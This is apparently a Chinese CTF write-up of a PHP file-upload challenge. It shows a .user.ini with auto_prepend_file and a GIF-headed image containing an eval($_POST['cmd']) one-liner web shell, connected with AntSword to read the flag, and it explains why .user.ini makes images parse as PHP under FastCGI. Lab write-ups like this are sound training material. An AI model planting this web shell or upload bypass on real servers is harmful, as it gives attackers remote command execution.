本文介绍了如何利用.user.ini文件实现PHP的图片解析漏洞,通过修改Content-Type和上传恶意代码,最终获取服务器权限。讲解了.user.ini文件在服务器中的作用,以及它如何在FastCGI环境下补充php.ini配置并导致安全问题。此外,还分享了作者在解决此类问题时的经验和技巧。
题目
访问题目路径
题如其名,文件上传的形式,那么我先把正常的上传步骤告诉大家,然后我再说我是怎么做的
先是上传.user.ini,并对Content-Type: image/jpeg进行修改
.user.ini
GIF89a
auto_prepend_file=a.jpg
上传成功
再上传a.jpg,这个直接就能上传成功
GIF89a
<?=eval($_POST['cmd']);?>
火狐浏览器右键检查->网络。直接查看,文件去向
蚁剑连接
找flag
接下来,大家可看可不看,我告诉大家,我是怎么找到过滤的,又是怎么发现是.user.ini的,我拿到题一点头绪没有,但是这几天做题,我发现我有一个一句话木马的总结,刚好被我试出来了
然后呢,这里涉及了一个比较重要的知识点,那就是.user.ini是为什么会把图片进行php解析的
在服务器中,只要是运用了fastcgi的服务器就能够利用该方式getshell,不论是apache或者ngnix或是其他服务器。这个文件是php.ini的补充文件,当网页访问的时候就会自动查看当前目录下是否有.user.ini,然后将其补充进php.ini,并作为cgi的启动项。其中很多功能设置了只能php.ini配置,但是还是有一些危险的功能可以被我们控制
扫一扫
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
